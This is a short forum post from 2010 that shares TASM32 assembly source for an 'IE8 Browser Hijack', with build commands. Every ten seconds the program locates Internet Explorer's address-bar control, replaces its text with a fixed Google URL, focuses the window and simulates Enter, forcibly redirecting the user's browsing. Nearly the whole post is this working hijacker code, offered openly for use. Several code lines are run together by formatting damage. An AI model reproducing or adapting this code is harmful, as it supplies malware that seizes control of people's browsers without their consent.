IE8 Browser Hijack

[JMC31337]

plenty of examples of an IE 8 hijacker on the net

heres one in tasm32

;tasm32 /ml hijak
;tlink32 -x -c -aa hijak,,,import32
.386P
Locals
jumps
.Model Flat ,StdCallinclude windows.incextrn FindWindowExA:PROC
extrn FindWindowA:PROC
extrn SendMessageA:PROC
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
extrn SetForegroundWindow:PROC
extrn keybd_event:PROC
extrn Sleep:PROCVK_RETURN equ 0Dh
SW_SHOWNORMAL equ 1.data?
buff db ?.data
hwnd dd 0
ieclass db "IEFrame",0
ieworker db"WorkerW",0
ieadd db "Address Combo Control",0
ienav db "Navigation Bar",0
ierebar db "ReBarWindow32",0
iebar db "ToolBarWindow32",0
ieedit db "Edit",0
ieroot db"Address Band Root",0
addrs db "http://www.google.com/search?hl=en&source=hp&q=&btnI=I%27m+Feeling+Lucky&aq=f&aqi=&aql=&oq=&gs_rfai=",0.code
start:
loop:
call Sleep,10000push 0
push offset ieclass
call FindWindowAmov [hwnd],eaxpush 0
push offset ieworker
push 0
push hwnd
call FindWindowExA
mov [hwnd],eaxpush 0
push offset ierebar
push 0
push hwnd
call FindWindowExAmov [hwnd],eax
push 0
push offset ieroot
push 0
push hwnd
call FindWindowExAmov [hwnd],eaxpush 0
push offset ieedit
push 0
push hwnd
call FindWindowExAmov [hwnd],eaxpush offset buff
push 260
push WM_GETTEXT
push hwnd
call SendMessageA;push 0
;push 0
;push offset buff
;push 0
;call MessageBoxApush offset addrs
push 0
push WM_SETTEXT
push hwnd
call SendMessageApush SW_SHOWNORMAL
push [hwnd]
call SetForegroundWindowpush 0 
push 0
push 0
push VK_RETURN
call keybd_eventjmp loop
call ExitProcess
end start

Edited December 15, 2010 by JMC31337